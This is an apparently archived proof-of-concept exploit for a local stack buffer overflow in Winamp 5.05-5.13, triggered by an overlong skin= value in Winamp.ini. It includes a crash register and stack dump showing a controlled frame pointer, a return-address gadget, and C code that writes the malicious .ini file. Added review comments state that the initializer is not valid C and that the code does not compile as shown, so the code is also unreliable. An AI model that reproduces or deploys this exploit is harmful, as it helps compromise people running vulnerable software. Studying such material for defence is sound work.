Winamp 5.05-5.13 .ini local stack buffer overflow poc
来源:flo_flow_supremacy[at]yahoo.com 作者:fl0_fl0w 发布时间:2010-01-14  

/*Winamp 5.05-5.13 .ini local stack buffer overflow poc
The problem is in the skin field: when a long string is
written there, it causes the buffer overflow.
All you have to do is replace this file with the initial one.
-snipp--
[Winamp]
visplugin_name=vis_avs.dll
visplugin_num=0
mw_open=1
outname=out_ds.dll
proxyonly80=0
Proxy=
inet_mode=0
langpack=
skin=long string
-snipp--
Registers
EAX 001E0A17
ECX 00008E3E
EDX 7C90EB94 ntdll.KiFastSystemCallRet
EBX 004C0304 winamp.004C0304
ESP 0012965C ASCII "edit.txt"
EBP 41414141   ->controlled
ESI 77D5355A USER32.GetSubMenu
EDI 00009D85
EIP 6C705C41
Stack:
0012914A   41414141
0012914E   41414141
00129152   41414141
00129156   41414141
0012915A   41414141
0012915E   41414141
00129162   41414141
....................
77F30A7A   5D               POP EBP
77F30A7B   C3               RETN
 "\x7A\x0A\xF3\x77"
*/
#include<stdio.h>
#include<stdlib.h>
#include<string.h>

#define Fil3 "Winamp.ini"
    /*
     * .ini text that fmake() writes out to Fil3 ("Winamp.ini").
     *
     * NOTE(review): the lines inside the braces are bare text, not
     * string literals, so this initializer is not valid C and the
     * translation unit does not compile as shown. The header comment
     * above states that the oversized skin= value is what triggers the
     * overflow; the remaining keys look like ordinary Winamp.ini
     * settings. fmake() below refers to the array as `Data` (capital D),
     * which does not match this name.
     */
    char data[]=
    {
       [Winamp]
       visplugin_name=vis_avs.dll
       visplugin_num=0
       mw_open=1
       outname=out_ds.dll
       proxyonly80=0  
       Proxy=   
       inet_mode=0  
       langpack=
       skin=AAAAAAAAAAAAAAAAAAAABBBBBBBBBBrQF69AzBlax3CF3EDNhm3soLBPh71YexuieaoEiIgxIX4a2dREbbSqWy6yhKIDCdJOyapnxrpMCARCr4zdGc81tBDKsMlaZTXC1O8YFOGKjxRrJBdT3hVOfoaMeAjSWfchoZYFYZ5B6kzMCk8R6BEuZMrF6cI6NX8DYdD3ojxSnqPTGfRyilOYGxlSXPtLJboH8S4kwIgTxSl1C00GOzOLMrbAyfKUUT2222Rblsaqv6UpdvNIsNr
       defext=mp3
       titlefmt=[%artist% - ]$if2(%title%,$filepart(%filename%))
       dspplugin_name=
       check_ft_startup=1
       pe_fontsize=11
       visplugin_priority=2
       visplugin_autoexec=0
       dspplugin_num=0
       sticon=0
       splash=0
       taskbar=0
       dropaotfs=1
       ascb_new=1
       ttips=1
       riol=0
       minst=0
       whichicon=1
       whichicon2=1
       addtolist=0
       snap=1
       snaplen=10
       parent=1
       hilite=1
       disvis=1
       rofiob=0
       shownumsinpl=1
       keeponscreen=1
       eqdsize=1
       usecursors=1
       fixtitles=3
       priority=1
       shuffle_morph_rate=50
       useexttitles=1
       bifont=0
       ospb=0
       embedwnd_freesize=0
       no_visseh=0
       newverchk=11413
       newverchk2=0
       last_shortdesc=
       last_shorturl=
       prefs_last_page=552
       autoload_eq=0
       use_eq=1
       eq_ws=0
       wx=26
       wy=29
       minimized=0
       aot=0
       shuffle=0
       repeat=1
       volume=82
       pan=0
       easymove=1
       dsize=0
       timeleftmode=0
       autoscrollname=1
       sa=1
       safire=4
       saref=2
       safalloff=2
       sa_peaks=1
       sa_peak_falloff=1
       eq_wx=26
       eq_wy=145
       eq_open=1
       pe_wx=26
       pe_wy=261
       pe_open=1
       pe_width=275
       pe_height=145
       pe_height_ws=
       mb_wx=301
       mb_wy=29
       mb_open=0
       mb_width=350
       mb_height=348
       video_wx=26
       video_wy=145
       video_open=0
       video_width=275
       video_height=232
       video_ratio1=4
       video_ratio2=3
       video_useratio=0
       windowshade=0
       preamp=31
       pilp=0
       randskin=0
       cwd=G:\Program Files\Winamp
       pladv=1
       eq_data=32,22,31,41,40,31,19,16,16,17
       video_vsync=0
       video_aspectadj=1
       video_overlays=1
       video_ddraw=1
       video_updsize=1
       video_autoopen=1
       video_autoclose=1
       video_noss=1
       video_osd=1
       video_yv12=1
       video_stopclose=1
       video_remove_fs_on_stop=0
       wav_do_header=1
       wav_convert=0
       wav_ext=WAV
       playlist_custom_font=Arial
       custom_plfont=0
       [WAV Writing Output Driver]
       config_waveoutdir=c:\
       cfg_cvt=
       cfg_wav1=
       cfg_wav1p=c:\out.wav
cfg_mode=
cfg_thread=
cfg_killsilence=
cfg_wfx_s=18
cfg_wfx=0100020044AC000010B10200040010000000CA
cfg_wfx1=0100020044AC000010B10200040010000000CA
[gen_ff]
classicplws=0
classicplwidth=275
classicplheight=145
classicmw=1
classiceq=1
[out_ds]
cfg_total_time=54A15F08000000005C
[AVS]
smp=0
smp_mt=2
wx=32
wy=32
ww=300
wh=232
config_pres_subdir=
cfg_docked=0
cfg_cfgwnd_open=0
cfg_cfgwnd_x=50
cfg_cfgwnd_y=50
cfg_fs_w=0
cfg_fs_h=0
cfg_fs_d=2
cfg_fs_bpp=0
cfg_fs_fps=6
cfg_fs_rnd=1
cfg_fs_rnd_time=10
cfg_fs_dblclk=1
cfg_fs_flip=0
cfg_fs_height=80
cfg_fs_use_overlay=0
cfg_fs_cancelondeactivate=1
cfg_speed=5
cfg_trans=0
cfg_dont_min_avs=0
cfg_smartbeat=0
cfg_smartbeatsticky=1
cfg_smartbeatresetnewsong=1
cfg_smartbeatonlysticky=0
cfg_transitions_en=4
cfg_transitions_preinit=36
cfg_transitions_speed=8
cfg_transitions_mode=32769
cfg_bkgnd_render=0
cfg_bkgnd_render_color=2031631
cfg_render_prio=0
g_preset_dirty=0
cfg_prompt_save_preset=1
last_preset_name=
cfg_reuseonresize=1
cfg_log_errors=0
cfg_reset_vars=1
cfg_seh=1
debugreg_0=0
debugreg_1=1
debugreg_2=2
debugreg_3=3
debugreg_4=4
debugreg_5=5
debugreg_6=6
debugreg_7=7
 
    };    
    /* Banner text that main() prints before the file is generated. */
    char header[] =
        "*******************************************************\n"
        "  Winamp 5.05-5.13 .ini local stack buffer overflow poc\n"
        "       by fl0 fl0w                                     \n"
        "*******************************************************\n";
/*----------prototypes---------*/
     int fmake(char*);   /* write the embedded .ini text to the named file; defined below */
     void print(char*);  /* print a "[*]"-tagged status line; defined below */
/*-----main-----------*/
    /*
     * Entry point: print the banner, generate the file named by Fil3,
     * then wait for one character of input before returning.
     * Always returns 0 (fmake() exits the process itself on error).
     */
    int main()
    {
        fputs(header, stdout);
        (void)fmake(Fil3);
        (void)getchar();
        return 0;
    }
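    /*
     * Write the file-scope .ini text `data` to `fname`, overwriting any
     * existing file.
     *
     * fname: path of the file to create (main() passes Fil3).
     * Returns 0 on success. If the file cannot be opened, written or
     * closed, a message is printed and the process exits with
     * EXIT_FAILURE.
     *
     * Fixes relative to the original: it referenced an undeclared `Data`
     * instead of `data`; it called free() on that static array, which is
     * undefined behaviour (nothing here is heap-allocated, so nothing is
     * freed); it exited with status 0 on error, hiding the failure from
     * callers; and the fputs()/fclose() results were unchecked, so a
     * short or failed write still reported "Done".
     */
    int fmake(char* fname)
    {
        FILE *f = fopen(fname, "wb");
        if (f == NULL)
        {
            print("File error");
            exit(EXIT_FAILURE);
        }
        int ok = fputs(data, f) != EOF;
        /* fclose() flushes buffered output; a failure here is a write failure too. */
        if (fclose(f) != 0)
        {
            ok = 0;
        }
        if (!ok)
        {
            print("Write error");
            exit(EXIT_FAILURE);
        }
        print("Winamp.ini file Done!");
        return 0;
    }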
    /*
     * Print msg on its own line, prefixed with "[*]" and preceded by a
     * blank line. msg must be a NUL-terminated string.
     */
    void print(char* msg)
    {
        fprintf(stdout, "\n[*]%s\n", msg);
    }
 


 